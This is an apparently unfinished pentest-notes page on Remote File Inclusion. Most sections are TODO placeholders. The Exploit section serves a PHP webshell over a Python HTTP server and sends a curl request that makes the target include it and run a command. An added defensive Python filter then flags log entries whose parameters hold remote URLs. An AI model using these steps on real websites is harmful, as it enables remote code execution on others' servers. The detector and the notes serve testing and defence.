Remote File Inclusion
Vulnerability
TODO: Describe the vulnerability here.
Prerequisites
- TODO: List prerequisites here.
Exploit
First, identify a target website that loads external content or resources. Then, prepare a payload. For example, if you target a PHP web application, /usr/share/webshells/php/ contains multiple useful webshells. You need to make one of these accessible to your target.
# Go to your payload's directory
cd /usr/share/webshells/php/
# Make it available on port 80
python3 -m http.server 80
# Ask your target to access the payload exposed on your Python HTTP server
curl "http://$target/whatever/index.php?page=http://$lhost/simple-backdoor.php&cmd=ls"
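Seen from the defender's side, the request above leaves a recognisable trace in the web server's access log: a query parameter whose value is a remote URL. The following Python filter is an added example, not part of the original page; the log lines, addresses and function names are constructed for illustration, and it goes slightly beyond the page by also matching ftp:// and values that were URL-encoded more than once.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /whatever/index.php'
    '?page=http://198.51.100.7/simple-backdoor.php&cmd=ls HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /whatever/index.php'
    '?page=http%253A%252F%252F198.51.100.7%252Fx.php HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /whatever/index.php'
    '?page=about HTTP/1.1" 200 2048',
    '192.0.2.11 - - [01/Jan/2024:10:02:00 +0000] "GET /search'
    '?q=what+is+http HTTP/1.1" 200 1024',
]

# Request line inside a common/combined log format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD|PUT) (\S+) HTTP/[\d.]+"')
# A parameter value that *starts* with a remote URL scheme.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (bounded, so it always terminates)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_candidates(lines):
    """Return (client_ip, parameter, decoded_value) for suspicious requests."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qsl already decodes once; fully_decode handles double encoding.
        for name, value in parse_qsl(query, keep_blank_values=True):
            decoded = fully_decode(value)
            if REMOTE_RE.match(decoded):
                hits.append((line.split()[0], name, decoded))
    return hits


if __name__ == "__main__":
    for hit in find_rfi_candidates(SAMPLE_LOG):
        print(hit)
```

Matching only at the start of the decoded value keeps ordinary search terms that merely contain "http" out of the results.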
Useful links
- TODO: List links here.
Recommendations
- TODO: List recommendations here.